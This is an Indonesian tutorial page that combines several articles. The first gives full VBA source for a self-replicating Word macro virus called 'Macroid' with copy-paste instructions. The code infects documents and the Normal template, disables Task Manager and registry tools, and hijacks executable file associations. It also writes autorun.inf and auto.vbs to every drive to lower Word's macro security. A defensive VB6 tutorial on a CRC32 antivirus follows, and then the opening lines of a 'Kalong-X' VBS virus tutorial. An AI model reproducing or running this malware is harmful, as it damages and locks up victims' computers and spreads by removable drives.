Virus Tutorial : Tehnik Membuat Virus Macro By Wong Liyo

(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)

Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.

Kali ini saya akan membahas mengenai virus macro... (para virus maker diharap untuk tenang dulu!).

Pasti banyak bertanya kenapa kali ini Morphic membahas tentang cara membuat virus? Biasanya kan Morphic lebih sering membahas analisis virus atau antivirusnya itu….

Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.

Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..

Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.

CARA MEMBUAT VIRUS MACRO

Buka Ms.Word (hanya contoh)

buka tools > Macro> Visual Basic Editor



Akan muncul gambar di bawah



Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.



Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???

Tenang, aku dah siapkan kok sourcenya. Makan neh source code!


'This is my code's virus


'


'Fuck Gates. Your software has small weakness. Watch it!


'


'Macro Viruses


'[Macroid]


'


'Hanya untuk pembelajaran




Private Sub Document_Close()


Dim AD, NT As Object


Dim isi As String


Set AD = ActiveDocument.VBProject.VBComponents.Item(1)


Set NT = NormalTemplate.VBProject.VBComponents.Item(1)




If AD.Name <> "Macroid" Then


AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines


AD.Name = "Macroid"


isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)


AD.CodeModule.AddFromString isi


ActiveDocument.Save


End If




If NT.Name <> "Macroid" Then


NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines


NT.Name = "Macroid"


isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)


NT.CodeModule.AddFromString isi


NormalTemplate.Save


End If




If InStr(ActiveDocument.Content, "Macroid") = 0 Then


ActiveDocument.Content = "[Macroid]" & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & "[Macroid] by Morphic" & vbCrLf & "copyright(c) Medan Juli-2008"


End If




On Error Resume Next


Dim b As Object


Set b = CreateObject("Wscript.Shell")


b.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title", "Browser Internet ini diambil alih oleh Macroid"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "VM-Morphic"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Macroid-A. Eat this!!! Ha ha ha"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "2"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\", "Tong Sampah Macroid"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Komputer Morphic"


b.regwrite "HKLM\SOFTWARE\Classes\exefile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\comfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\txtfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\scrfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\batfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shell\", "0pen"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\", "&Open"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\command\", "wscript.exe " & Environ$("windir") & "\avmc.vbs"


b.regwrite "HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"




On Error Resume Next


Dim rog As Integer


Dim atr, vbs, Tipu(10), Trik(10) As String


For a = 66 To 90


partisi = Chr$(a)


vbs = partisi & ":\auto.vbs"


atr = partisi & ":\autorun.inf"


Tipu(1) = partisi & ":\Soal SPMB 1995-2008.doc"


Tipu(2) = partisi & ":\Kisah di balik HarryPotter.doc"


Tipu(3) = partisi & ":\Titip File sebentar.doc"


Tipu(4) = partisi & ":\jangan di baca.doc"


Tipu(5) = partisi & ":\buku harian.doc"


Tipu(6) = partisi & ":\cerita hangat.doc"


Tipu(7) = partisi & ":\Punya Baim.doc"


Tipu(8) = partisi & ":\Teka-teki yang baru.doc"


Tipu(9) = partisi & ":\Kumpulan cerita lucu.doc"


Tipu(10) = partisi & ":\Trik Sulap.doc"


If Dir(Tipu(1)) = "" And Dir(Tipu(2)) = "" And Dir(Tipu(3)) = "" And Dir(Tipu(4)) = "" And Dir(Tipu(5)) = "" And Dir(Tipu(6)) = "" And Dir(Tipu(7)) = "" And Dir(Tipu(8)) = "" And Dir(Tipu(9)) = "" And Dir(Tipu(10)) = "" Then


Randomize


rog = Int(10 * Rnd) + 1


Open Tipu(rog) For Output As #1


Print #1, ""


Close #1


End If


Trik(1) = partisi & ":\Novel J.K.Rowling.doc"


Trik(2) = partisi & ":\cerita cinta.doc"


Trik(3) = partisi & ":\Ringkasan cerita HarryPotter.doc"


Trik(4) = partisi & ":\Semua Cheat game DOTA.doc"


Trik(5) = partisi & ":\Kumpulan Cheat game.doc"


Trik(6) = partisi & ":\Cheat game RF.doc"


Trik(7) = partisi & ":\Cheat game Ayo Dance.doc"


Trik(8) = partisi & ":\Goosebumps.doc"


Trik(9) = partisi & ":\FearStreet.doc"


Trik(10) = partisi & ":\R.L.Stine.doc"




If Dir(Trik(1)) = "" And Dir(Trik(2)) = "" And Dir(Trik(3)) = "" And Dir(Trik(4)) = "" And Dir(Trik(5)) = "" And Dir(Trik(6)) = "" And Dir(Trik(7)) = "" And Dir(Trik(8)) = "" And Dir(Trik(9)) = "" And Dir(Trik(10)) = "" Then


Randomize


rogi = Int(10 * Rnd) + 1


Open Trik(rogi) For Output As #1


Print #1, ""


Close #1


End If


Open atr For Output As #1


Print #1, "[Autorun]"


Print #1, "shell\Open\command=wscript.exe auto.vbs"


Close #1


SetAttr atr, vbHidden + vbSystem


Open vbs For Output As #1


Print #1, "dim a"


Print #1, "set a = createobject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\11.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\12.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Close #1


SetAttr vbs, vbHidden + vbSystem


Next a




If Dir(Environ$("windir") & "\Macroid.doc") = "" Then


Dim isicrita As String


isicrita = "[Macroid] by Morphic" & vbCrLf & "Copyright(c) Medan Juli-2008" & vbCrLf & vbCrLf & _


Chr(34) & "Ms.Word is a thing that can be used as a power to break everything.... " & Chr(34) & vbCrLf & "(Morphic)"


Open Environ$("windir") & "\Macroid.doc" For Output As #1


Print #1, isicrita


Close #1


End If




If Dir(Environ$("windir") & "\avmc.vbs") = "" Then


Open Environ$("windir") & "\avmc.vbs" For Output As #1


Print #1, "set fs = createobject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"


Print #1, "for each FD in fs.drives"


Print #1, "if (FD.Drivetype = 1) and FD.Path <> " & Chr(34) & "A:" & Chr(34) & " then"


Print #1, "set tf = fs.CreateTextFile(FD.Path" & Chr(38) & Chr(34) & "\Jangan di baca.doc" & Chr(34) & ")"


Print #1, "end if"


Print #1, "Next"


Close #1


End If


ActiveDocument.Save


NormalTemplate.Save


End Sub




Private Sub Document_Open()


CommandBars("Tools").Controls("Macro").Visible = False


CommandBars("Tools").Controls("Macro").Enabled = False


CommandBars("Tools").Controls("Customize...").Visible = False


CommandBars("Tools").Controls("Options...").Visible = False




Dim AD, NT As Object


Dim isi As String


Set AD = ActiveDocument.VBProject.VBComponents.Item(1)


Set NT = NormalTemplate.VBProject.VBComponents.Item(1)




If AD.Name <> "Macroid" Then


AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines


AD.Name = "Macroid"


isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)


AD.CodeModule.AddFromString isi


ActiveDocument.Save


End If




If NT.Name <> "Macroid" Then


NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines


NT.Name = "Macroid"


isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)


NT.CodeModule.AddFromString isi


NormalTemplate.Save


End If




If InStr(ActiveDocument.Content, "Macroid") = 0 Then


ActiveDocument.Content = "[Macroid]" & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & "[Macroid] by Morphic" & vbCrLf & "copyright(c) Medan Juli-2008"


End If




On Error Resume Next


Dim b As Object


Set b = CreateObject("Wscript.Shell")


b.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title", "Browser Internet ini diambil alih oleh Macroid"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "VM-Morphic"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Macroid-A. Eat this!!! Ha ha ha"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "2"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\", "Tong Sampah Macroid"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Komputer Morphic"


b.regwrite "HKLM\SOFTWARE\Classes\exefile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\comfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\txtfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\scrfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\batfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shell\", "0pen"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\", "&Open"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\command\", "wscript.exe " & Environ$("windir") & "\avmc.vbs"


b.regwrite "HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"




On Error Resume Next


Dim rog As Integer


Dim atr, vbs, Tipu(10), Trik(10) As String


For a = 66 To 90


partisi = Chr$(a)


vbs = partisi & ":\auto.vbs"


atr = partisi & ":\autorun.inf"


Tipu(1) = partisi & ":\Soal SPMB 1995-2008.doc"


Tipu(2) = partisi & ":\Kisah di balik HarryPotter.doc"


Tipu(3) = partisi & ":\Titip File sebentar.doc"


Tipu(4) = partisi & ":\jangan di baca.doc"


Tipu(5) = partisi & ":\buku harian.doc"


Tipu(6) = partisi & ":\cerita hangat.doc"


Tipu(7) = partisi & ":\Punya Baim.doc"


Tipu(8) = partisi & ":\Teka-teki yang baru.doc"


Tipu(9) = partisi & ":\Kumpulan cerita lucu.doc"


Tipu(10) = partisi & ":\Trik Sulap.doc"


If Dir(Tipu(1)) = "" And Dir(Tipu(2)) = "" And Dir(Tipu(3)) = "" And Dir(Tipu(4)) = "" And Dir(Tipu(5)) = "" And Dir(Tipu(6)) = "" And Dir(Tipu(7)) = "" And Dir(Tipu(8)) = "" And Dir(Tipu(9)) = "" And Dir(Tipu(10)) = "" Then


Randomize


rog = Int(10 * Rnd) + 1


Open Tipu(rog) For Output As #1


Print #1, ""


Close #1


End If


Trik(1) = partisi & ":\Novel J.K.Rowling.doc"


Trik(2) = partisi & ":\cerita cinta.doc"


Trik(3) = partisi & ":\Ringkasan cerita HarryPotter.doc"


Trik(4) = partisi & ":\Semua Cheat game DOTA.doc"


Trik(5) = partisi & ":\Kumpulan Cheat game.doc"


Trik(6) = partisi & ":\Cheat game RF.doc"


Trik(7) = partisi & ":\Cheat game Ayo Dance.doc"


Trik(8) = partisi & ":\Goosebumps.doc"


Trik(9) = partisi & ":\FearStreet.doc"


Trik(10) = partisi & ":\R.L.Stine.doc"




If Dir(Trik(1)) = "" And Dir(Trik(2)) = "" And Dir(Trik(3)) = "" And Dir(Trik(4)) = "" And Dir(Trik(5)) = "" And Dir(Trik(6)) = "" And Dir(Trik(7)) = "" And Dir(Trik(8)) = "" And Dir(Trik(9)) = "" And Dir(Trik(10)) = "" Then


Randomize


rogi = Int(10 * Rnd) + 1


Open Trik(rogi) For Output As #1


Print #1, ""


Close #1


End If


Open atr For Output As #1


Print #1, "[Autorun]"


Print #1, "shell\Open\command=wscript.exe auto.vbs"


Close #1


SetAttr atr, vbHidden + vbSystem


Open vbs For Output As #1


Print #1, "dim a"


Print #1, "set a = createobject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\11.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\12.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Close #1


SetAttr vbs, vbHidden + vbSystem


Next a




End Sub






Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg....... Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.

EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI





Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!

Jawabannya lihat di bawah!!

Membuat Anti Virus Sendiri

Notes :
- Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
- Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
- Penggunaan nama, merek, atau logo hanya sebagai CONTOH dan REFERENSI saja, TIDAK ada maksud mempromosikan pihak tertentu.
- Penulis mohon maaf apabila seluruh/sebagian dari isi artikel ini sudah tersirat dalam artikel sejenis lainnya.


Main#
Sekarang kehadiran para virus maker (–selanjutnya disingkat jadi VM saja) lokal telah membuat gerah para user komputer tanah air. Bisa dibayangkan bila dari sekian banyak virus lokal tidak satu-dua yang menghancurkan data (terutama bagi file office; word, excel, dll…). Bagi para vendor Anti Virus (–selanjutnya disingkat menjadi AV saja) fenomena ini adalah lahan bisnis untuk produk mereka. Sebut saja NORMAN, yang kini men-support perusahaan konsultan virus lokal (–VAKSIN.COM) , Symantec, McAffe, NOD32, dan sebagainya. Dengan menawarkan update definisi software AV tercepat, engine scanner paling sensitif, dan lain-lain merupakan kiat untuk memancing para korban virus membeli dan menggunakan software AV mereka. Bagi penulis sendiri hal ini memang agak memberatkan mengingat update file definisi atau engine AV tsb haruslah melalui koneksi internet. Lalu bagaimana yang tidak mempunyai akses sama sekali? Konsekuensinya iyalah tertinggal dalam hal pengenalan varian virus baru yang pada ujung-ujungnya membuat AV yang sudah terinstall bagai ‘Macan Ompong’. Kalau kita membuat AV sendiri bagaimana? dengan database definisi yang bisa diupdate oleh kita bahkan dapat saling tukar dengan teman? Bisa saja, dengan syarat mau mempelajari sedikit teknik pemograman.

Pertama kita harus mengerti bagaimana cara kerja sebuah AV sederhana, pada dasarnya sebuah software AV mempunyai komponen-komponen :

1. Engine scanner, ini merupakan komponen utama AV dalam mengenali sebuah pattern virus. Engine ini dapat dikelompokkan menjadi statis dan dinamis. Statis dalam hal ini dapat disebut menjadi spesifik terhadap pattern tertentu dari sebuah file virus. Checksum merupakan salah satu contoh dari engine statis ini. Dinamis dalam artian dia mengenali perilaku ‘umum’ sebuah virus. Heuristic menjadi salah satu contohnya.
2. Database definition, menjadi sebuah referensi dari sebuah pattern file virus. Engine statis sangat bergantung kepada komponen ini.
3. Decompress atau unpacking engine, khusus untuk pengecekan file-file yang terkompresi (*.rar, *.zip, dll) atau kompresi atau packing untuk file PE seperti UPX, MeW , dll.

Tidak jarang hasil dari pengecekan terhadap file suspect virus menghasilkan false-positive bahkan false-negative (– false-positive berarti file yang bersih dianggap thread oleh AV, dan false-negative berarti file yang 100% thread akan dianggap bersih). Semua itu dapat diakibatkan oleh ketidak-sempurnaan dari engine scanner itu sendiri. Misal
pada contoh kasus Engine String scanner (–Engine scanner yang menyeleksi string-string dari file text-based), bila diterapkan rule 3 out of 5 (– bila AV menemukan 3 dari daftar 5 string kategori malicious) maka AV akan memberikan bahwa file terindikasi sebuah thread yang positif. Padahal file tsb nyatanya tidak menimbulkan efek berbahaya bila dijalankan atau dieksekusi. Kesalahan scanning macam ini lazim ditemukan untuk file-file *.VBS, *.HTML, dll. Untuk penggunaan engine checksum sangat banyak ditemui di beberapa software AV lokal. Checksum yang lazim digunakan diantaranya CRC16, CRC32, MD5, dll. Dikarenakan mudah untuk diimplementasikan. Engine ini sendiri bukannya tanpa cacat, Checksum bekerja dengan memproses byte demi byte dari sebuah file dengan sebuah algoritma tertenu (– tergantung dari jenis checksum yang digunakan) sehingga menghasilkan sebuah format tertentu dari file tsb. Contoh checksum menggunakan CRC32 dan MD5 :

* calCrc = CRC32(file_name_and_path)
* calMD5 = MD5(file_name_and_path)

Maka isi dari string calCrc adalah 7AF9E376, sedangkan untuk MD5nya adalah 529CA8050A00180790CF88B63468826A. Perlu diketahui bila virus menerapkan rutin yang mengubah byte tertentu dari badan virus tsb setiap kali maka penggunaan engine checksum ini akan kurang optimal karena bila 1 byte berubah dari file maka checksum juga akan berubah.

Mari kita belajar membuat sebuah AV sederhana, yang diperlukan :

1. Software Visual Basic 6.0
2. Sedikit pemahaman akan pemograman Visual Basic 6.0
3. Sampel file bersih atau virus (– opsional)

First#
Sekarang kita akan belajar membuat sebuah rutin sederhana untuk :
- Memilih file yang akan dicek
- Membuka file tersebut dalam mode binary
- Memproses byte demi byte untuk menghasilkan Checksum

Buka MS-Visual Basic 6.0 anda, lalu buatlah sebuah class module dan Form dengan menambahkan sebuah objek Textbox, CommonDialog dan Command Button. (Objek CommonDialog dapat ditambahkan dengan memilih Project -> COmponent atau Ctrl-T dan memilih Microsoft Common Dialog Control 6.0) Ketikkan kode berikut pada class module (kita beri nama class module tsb clsCrc) :

================= START HERE ====================

Private crcTable(0 To 255) As Long ‘crc32

Public Function CRC32(ByRef bArrayIn() As Byte, ByVal lLen As Long, Optional ByVal lcrc As Long = 0) As Long

‘bArrayIn adalah array byte dari file yang dibaca, lLen adalah ukuran atau size file

Dim lCurPos As Long ‘Current position untuk iterasi proses array bArrayIn
Dim lTemp As Long ‘variabel temp hasil perhitungan

If lLen = 0 Then Exit Function ‘keluar fungsi apabila ukuran file = 0
lTemp = lcrc Xor &HFFFFFFFF

For lCurPos = 0 To lLen
lTemp = (((lTemp And &HFFFFFF00) \ &H100) And &HFFFFFF) Xor (crcTable((lTemp And 255) Xor bArrayIn(lCurPos)))
Next lCurPos

CRC32 = lTemp Xor &HFFFFFFFF

End Function

Private Function BuildTable() As Boolean
Dim i As Long, x As Long, crc As Long
Const Limit = &HEDB88320

For i = 0 To 255
crc = i
For x = 0 To 7
If crc And 1 Then
crc = (((crc And &HFFFFFFFE) \ 2) And &H7FFFFFFF) Xor Limit
Else
crc = ((crc And &HFFFFFFFE) \ 2) And &H7FFFFFFF
End If
Next x
crcTable(i) = crc
Next i
End Function

Private Sub Class_Initialize()
BuildTable
End Sub

================= END HERE ====================

Lalu ketikkan kode berikut dalam event Command1_Click :

================= START HERE ====================

Dim namaFileBuka As String, HasilCrc As String
Dim CCrc As New clsCrc ‘bikin objek baru dari class ClsCrc
Dim calCrc As Long
Dim tmp() As Byte ‘array buat file yang dibaca

Private Sub Command1_Click()
CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog
CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog

On Error GoTo erorhandle ‘label error handle

CommonDialog1.ShowOpen
namafilbuka = CommonDialog1.FileName
Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca pada mode binary
ReDim tmp(LOF(1) - 1) As Byte ‘deklarasi ulang untuk array, # Bugs Fixed #
Get #1, , tmp()
Close #1

calCrc = UBound(tmp) ‘mengambil ukuran file dari array
calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC

HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric
Text1.Text = HasilCrc ‘tampilkan hasilnya
Exit Sub

erorhandle:
If Err.Number <> 32755 Then MsgBox Err.Description ‘error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file

================= END HERE ====================

COba anda jalankan program diatas dengan memencet tombol F5, lalu klik Command1 untuk memilih dan membuka file. Maka program akan menampilkan CRC32nya.

Second#
Kode diatas dapat kita buat menjadi sebuah rutin pengecekan file suspect virus dengan antara membandingkan hasil CRC32nya dan database CRC kita sendiri. Algoritmanya adalah :
- Memilih file yang akan dicek
- Membuka file tersebut dalam mode binary
- Memproses byte demi byte untuk menghasilkan Checksum
- Buka file database
- Ambil isi file baris demi baris
- Samakan Checksum hasil perhitungan dengan checksum dari file

Format file database dapat kita tentukan sendiri, misal :
- FluBurung.A=ABCDEFGH
- Diary.A=12345678
Dimana FluBurung.A adalah nama virus dan ABCDEFGH dalah Crc32nya. Jika kita mempunyai format file seperti diatas, maka kita perlu membaca file secara sekuensial per baris serta memisahkan antara nama virus dan Crc32nya. Dalam hal ini yang menjadi pemisah adalah karakter ‘=’.
Buat 1 module baru (– diberi nama module1) lalu isi dengan kode :

================= START HERE ====================

Public namaVirus As String, CrcVirus As String ‘deklarasi variabel global untuk nama dan CRC virus Public pathExe as String ‘deklarasi variabel penyimpan lokasi file EXE AV kita

Public Function cariDatabase(Crc As String, namaFileDB As String) As Boolean
Dim lineStr As String, tmp() As String ‘variabel penampung untuk isi file
Open namaFileDB For Input As #1 ‘buka file dengan mode input
Do
Line Input #1, lineStr
tmp = Split(lineStr, “=”) ‘pisahkan isi file bedasarkan pemisah karakter ‘=’
namaVirus = tmp(0) ‘masukkan namavirus ke variabel dari array
CrcVirus = tmp(1) ‘masukkan Crcvirus ke variabel dari array
If CrcVirus = Crc Then ‘bila CRC perhitungan cocok/match dengan database
cariDatabase = True ‘kembalikan nilai TRUE
Exit Do ‘keluar dari perulangan
End If
Loop Until EOF(1)
Close #1
End Function

================= END HERE ====================

Lalu tambahkan 1 objek baru kedalam Form, yaitu Command button2. lalu ketikkan listing kode berikut kedalam event Command2_Click :

================= START HERE ====================
If Len(App.Path) <= 3 Then ‘bila direktori kita adalah root direktori
pathEXE = App.Path
Else
pathEXE = App.Path & “\”
End If

CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog
CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog

On Error GoTo erorhandle ‘label error handle

CommonDialog1.ShowOpen
namafilbuka = CommonDialog1.FileName
Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca pada mode binary
ReDim tmp(LOF(1) - 1) As Byte ‘deklarasi ulang untuk array # Bugs Fixed #
Get #1, , tmp()
Close #1

calCrc = UBound(tmp) ‘mengambil ukuran file dari array
calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC

HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric
If cariDatabase(HasilCrc, pathEXE & “DB.txt”) Then ‘bila fungsi bernilai TRUE
MsgBox “Virus ditemukan : ” & namaVirus ‘tampilkan message Box
End If
Exit Sub

erorhandle:
If Err.Number <> 32755 Then MsgBox Err.Description ‘error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file

================= END HERE ====================

Fitur AV sederhana ini dapat ditambahkan dengan fitur process scanner, akses registry, real-time protection (RTP) dan lain lain. Untuk process scanner pada dasarnya adalah teknik enumerasi seluruh proses yang sedang berjalan pada Sistem Operasi, lalu mencari letak atau lokasi file dan melakukan proses scanning. Fitur akses registry memungkinkan kita untuk mengedit secara langsung registry windows apabila akses terhadap registry (–Regedit) diblok oleh virus. Sedangkan fitur RTP memungkinkan AV kita berjalan secara simultan dengan windows explorer untuk mengscan direktori atau file yang sedang kita browse atau lihat. Untuk ketiga fitur lanjutan ini akan dibahas pada artikel selanjutnya.

Kesimpulan#
Tidak harus membeli software AV yang mahal untuk menjaga komputer kita dari ancaman virus, kita bisa membuatnya sendiri dengan fitur-fitur yang tak kalah bagusnya. Memang terdapat ketidaksempurnaan dalam AV buatan sendiri ini, tetapi setidaknya dapat dijadikan pencegah dari infeksi virus komputer yang semakin merajalela. Software AV sederhana ini dilengkapi oleh engine scanner statis dan database definisi. Tidak tertutup kemungkinan software AV ini ditingkatkan lebih advanced dalam hal engine scannernya.

Penutup#
Pengembangan software AV sederhana ini sepenuhnya Open-Source selama mengikutsertakan nama pembuat asli didalamnya. Listing serta projek lengkap dapat didownload di http://www.geocities.com/emomelodicfreak/ProjekAV.zip

cara membuat virus via notepad

Hi…..
Melanjutkan artikel yang waktu itu “BUAT VIRUS VIA NOTEPAD” kita akan membuat virus yang lebih hebat lagi. Kalau ada yang belum tahu, saya mau minta maaf karena di artikel sebelumnya ada kesalahan code. Silahkan ganti kata “rekursif” menjadi “rekur”. Kalau enggak, bisa syntax error nanti

Nah kita akan buat varian lain dari KALONG.VBS. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….
‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next

‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd

’siapkan isi autorun
